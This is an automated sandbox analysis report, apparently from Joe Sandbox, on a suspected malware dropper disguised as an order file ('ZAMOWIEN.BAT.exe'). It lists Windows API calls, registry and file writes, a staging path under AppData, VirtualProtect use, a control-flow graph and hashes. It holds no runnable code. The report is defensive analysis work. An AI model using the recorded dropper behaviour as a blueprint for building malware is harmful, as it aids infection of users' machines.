                                                                                  • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                  control_flow_graph 772 7050177b-705017ba call 70501b63 776 705017c0-705017c4 772->776 777 705018da-705018dc 772->777 778 705017c6-705017cc call 70502356 776->778 779 705017cd-705017da call 70502398 776->779 778->779 784 7050180a-70501811 779->784 785 705017dc-705017e1 779->785 786 70501831-70501835 784->786 787 70501813-7050182f call 7050256d call 705015b4 call 70501272 GlobalFree 784->787 788 705017e3-705017e4 785->788 789 705017fc-705017ff 785->789 794 70501882-70501888 call 7050256d 786->794 795 70501837-70501880 call 705015c6 call 7050256d 786->795 812 70501889-7050188d 787->812 792 705017e6-705017e7 788->792 793 705017ec-705017ed call 70502a74 788->793 789->784 790 70501801-70501802 call 70502d2f 789->790 804 70501807 790->804 800 705017f4-705017fa call 70502728 792->800 801 705017e9-705017ea 792->801 807 705017f2 793->807 794->812 795->812 811 70501809 800->811 801->784 801->793 804->811 807->804 811->784 815 705018ca-705018d1 812->815 816 7050188f-7050189d call 70502530 812->816 815->777 818 705018d3-705018d4 GlobalFree 815->818 822 705018b5-705018bc 816->822 823 7050189f-705018a2 816->823 818->777 822->815 825 705018be-705018c9 call 7050153d 822->825 823->822 824 705018a4-705018ac 823->824 824->822 827 705018ae-705018af FreeLibrary 824->827 825->815 827->822
                                                                                  APIs
                                                                                    • Part of subcall function 70501B63: GlobalFree.KERNEL32(?), ref: 70501DB6
                                                                                    • Part of subcall function 70501B63: GlobalFree.KERNEL32(?), ref: 70501DBB
                                                                                    • Part of subcall function 70501B63: GlobalFree.KERNEL32(?), ref: 70501DC0
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70501829
                                                                                  • FreeLibrary.KERNEL32(?), ref: 705018AF
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 705018D4
                                                                                    • Part of subcall function 70502356: GlobalAlloc.KERNEL32(00000040,?), ref: 70502387
                                                                                    • Part of subcall function 70502728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,705017FA,00000000), ref: 705027F8
                                                                                    • Part of subcall function 705015C6: lstrcpyW.KERNEL32(?,70504020,00000000,705015C3,?,00000000,70501753,00000000), ref: 705015DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1791698881-3916222277
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseValuelstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp
                                                                                  • API String ID: 2655323295-2099554144
                                                                                  APIs
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405C12
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                    • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,?,00000000,000000F0), ref: 0040164D
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness, xrefs: 00401640
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness
                                                                                  • API String ID: 1892508949-3308940007
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                  • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                                  • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                  • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                  • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                                  • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                  • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                  • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                                  • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                  • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                  • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                                  • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                  • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                  • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                  • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                  • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll), ref: 00405359
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                  • String ID:
                                                                                  • API String ID: 334405425-0
                                                                                  APIs
                                                                                  • GlobalFree.KERNEL32(00742098), ref: 00401BE7
                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFree
                                                                                  • String ID: Call
                                                                                  • API String ID: 3394109436-1824292864
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(00000000), ref: 70502B33
                                                                                  • GetLastError.KERNEL32 ref: 70502C3A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 1214770103-0
                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  APIs
                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405C12
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                  • lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405CBA
                                                                                  • GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420), ref: 00405CCA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3248276644-0
                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                    • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                    • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                                    • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2547128583-0
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate
                                                                                  • String ID:
                                                                                  • API String ID: 415043291-0
                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1375471231-0
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointerwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 327478801-0
                                                                                  APIs
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWrite
                                                                                  • String ID:
                                                                                  • API String ID: 390214022-0
                                                                                  APIs
                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(7050405C,00000004,00000040,7050404C), ref: 705029B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000028,?,?,0040405B), ref: 0040423E
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C8B
